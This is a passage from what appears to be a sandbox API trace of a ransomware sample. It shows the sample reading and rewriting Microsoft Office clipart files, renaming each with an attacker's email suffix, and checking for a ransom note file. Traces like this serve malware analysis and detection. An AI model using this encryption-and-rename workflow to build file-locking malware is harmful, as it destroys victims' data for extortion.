returned 1 [0141.307] CloseHandle (hObject=0x1a8) returned 1 [0141.308] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107282.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0141.308] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0141.308] __uncaught_exception () returned 0x84b1160800 [0141.308] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0141.308] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107282.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107282.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107282.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107282.wmf.[evil@cock.lu].evil")) returned 1 [0141.309] ??_V@YAXPEAX@Z () returned 0x1 [0141.311] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107282.WMF", dwFileAttributes=0x200) returned 0 [0141.312] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0141.312] wcsstr (_Str="J0107288.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0141.312] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107288.WMF") returned 69 [0141.312] wcscmp (_String1="J0107288.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0141.312] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107288.WMF") returned 0x0 [0141.312] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107288.WMF") returned 0x45 [0141.312] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107288.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107288.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0141.313] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x347c, lpOverlapped=0x0) returned 1 [0141.321] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.321] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.321] _errno () returned 0x84b1160840 [0141.321] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.321] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x3480, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3480, lpOverlapped=0x0) returned 1 [0141.321] CloseHandle (hObject=0x1a8) returned 1 [0141.322] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107288.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0141.322] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0141.322] __uncaught_exception () returned 0x84b1160800 [0141.322] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0141.322] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107288.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107288.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107288.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107288.wmf.[evil@cock.lu].evil")) returned 1 [0141.324] ??_V@YAXPEAX@Z () returned 0x1 [0141.327] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107288.WMF", dwFileAttributes=0x200) returned 0 [0141.327] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0141.327] wcsstr (_Str="J0107290.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0141.327] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107290.WMF") returned 69 [0141.327] wcscmp (_String1="J0107290.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0141.327] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107290.WMF") returned 0x0 [0141.327] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107290.WMF") returned 0x45 [0141.327] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107290.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107290.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0141.329] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3014, lpOverlapped=0x0) returned 1 [0141.335] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.335] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.335] _errno () returned 0x84b1160840 [0141.335] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.335] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x3020, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3020, lpOverlapped=0x0) returned 1 [0141.335] CloseHandle (hObject=0x1a8) returned 1 [0141.335] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107290.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0141.336] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0141.336] __uncaught_exception () returned 0x84b1160800 [0141.336] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0141.336] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107290.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107290.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107290.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107290.wmf.[evil@cock.lu].evil")) returned 1 [0141.336] ??_V@YAXPEAX@Z () returned 0x1 [0141.339] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107290.WMF", dwFileAttributes=0x200) returned 0 [0141.339] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0141.339] wcsstr (_Str="J0107300.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0141.339] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107300.WMF") returned 69 [0141.339] wcscmp (_String1="J0107300.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0141.339] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107300.WMF") returned 0x0 [0141.339] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107300.WMF") returned 0x45 [0141.339] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107300.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107300.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0141.342] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x99c, lpOverlapped=0x0) returned 1 [0141.349] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.349] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.349] _errno () returned 0x84b1160840 [0141.349] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.349] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x9a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x9a0, lpOverlapped=0x0) returned 1 [0141.349] CloseHandle (hObject=0x1a8) returned 1 [0141.349] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107300.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0141.349] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0141.350] __uncaught_exception () returned 0x84b1160800 [0141.350] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0141.350] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107300.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107300.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107300.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107300.wmf.[evil@cock.lu].evil")) returned 1 [0141.350] ??_V@YAXPEAX@Z () returned 0x1 [0141.616] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107300.WMF", dwFileAttributes=0x200) returned 0 [0141.616] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0141.616] wcsstr (_Str="J0107302.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0141.616] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107302.WMF") returned 69 [0141.616] wcscmp (_String1="J0107302.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0141.616] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107302.WMF") returned 0x0 [0141.616] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107302.WMF") returned 0x45 [0141.618] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107302.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107302.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0141.620] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1028, lpOverlapped=0x0) returned 1 [0141.635] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.635] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.635] _errno () returned 0x84b1160840 [0141.635] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.635] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x1040, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1040, lpOverlapped=0x0) returned 1 [0141.636] CloseHandle (hObject=0x1a8) returned 1 [0141.636] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107302.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0141.636] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0141.636] __uncaught_exception () returned 0x84b1160800 [0141.636] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0141.636] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107302.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107302.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107302.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107302.wmf.[evil@cock.lu].evil")) returned 1 [0141.637] ??_V@YAXPEAX@Z () returned 0x1 [0141.640] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107302.WMF", dwFileAttributes=0x200) returned 0 [0141.640] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0141.640] wcsstr (_Str="J0107308.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0141.640] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107308.WMF") returned 69 [0141.640] wcscmp (_String1="J0107308.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0141.640] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107308.WMF") returned 0x0 [0141.640] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107308.WMF") returned 0x45 [0141.640] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107308.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107308.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0141.643] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3e10, lpOverlapped=0x0) returned 1 [0141.645] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.645] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.645] _errno () returned 0x84b1160840 [0141.645] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.646] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x3e20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3e20, lpOverlapped=0x0) returned 1 [0141.646] CloseHandle (hObject=0x1a8) returned 1 [0141.646] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107308.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0141.646] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0141.646] __uncaught_exception () returned 0x84b1160800 [0141.646] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0141.646] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107308.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107308.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107308.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107308.wmf.[evil@cock.lu].evil")) returned 1 [0141.647] ??_V@YAXPEAX@Z () returned 0x1 [0141.651] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107308.WMF", dwFileAttributes=0x200) returned 0 [0141.651] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0141.651] wcsstr (_Str="J0107314.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0141.651] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107314.WMF") returned 69 [0141.651] wcscmp (_String1="J0107314.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0141.651] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107314.WMF") returned 0x0 [0141.651] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107314.WMF") returned 0x45 [0141.651] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107314.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107314.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0141.653] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2a64, lpOverlapped=0x0) returned 1 [0141.662] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.662] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.662] _errno () returned 0x84b1160840 [0141.662] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.662] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x2a80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2a80, lpOverlapped=0x0) returned 1 [0141.662] CloseHandle (hObject=0x1a8) returned 1 [0141.662] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107314.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0141.662] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0141.662] __uncaught_exception () returned 0x84b1160800 [0141.662] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0141.663] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107314.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107314.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107314.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107314.wmf.[evil@cock.lu].evil")) returned 1 [0141.664] ??_V@YAXPEAX@Z () returned 0x1 [0141.667] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107314.WMF", dwFileAttributes=0x200) returned 0 [0141.667] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0141.678] wcsstr (_Str="J0107316.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0141.678] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107316.WMF") returned 69 [0141.678] wcscmp (_String1="J0107316.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0141.678] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107316.WMF") returned 0x0 [0141.678] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107316.WMF") returned 0x45 [0141.678] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107316.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107316.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0141.680] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2c18, lpOverlapped=0x0) returned 1 [0141.683] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.683] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.683] _errno () returned 0x84b1160840 [0141.683] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.683] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x2c20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2c20, lpOverlapped=0x0) returned 1 [0141.684] CloseHandle (hObject=0x1a8) returned 1 [0141.684] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107316.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0141.684] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0141.684] __uncaught_exception () returned 0x84b1160800 [0141.684] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0141.684] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107316.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107316.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107316.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107316.wmf.[evil@cock.lu].evil")) returned 1 [0141.685] ??_V@YAXPEAX@Z () returned 0x1 [0141.687] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107316.WMF", dwFileAttributes=0x200) returned 0 [0141.688] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0141.688] wcsstr (_Str="J0107328.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0141.688] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107328.WMF") returned 69 [0141.688] wcscmp (_String1="J0107328.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0141.688] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107328.WMF") returned 0x0 [0141.688] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107328.WMF") returned 0x45 [0141.688] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107328.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107328.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0141.689] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1984, lpOverlapped=0x0) returned 1 [0141.692] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.692] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.692] _errno () returned 0x84b1160840 [0141.692] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.692] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x19a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x19a0, lpOverlapped=0x0) returned 1 [0141.692] CloseHandle (hObject=0x1a8) returned 1 [0141.692] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107328.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0141.692] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0141.692] __uncaught_exception () returned 0x84b1160800 [0141.692] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0141.693] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107328.WMF" (normalized: "c:\\program 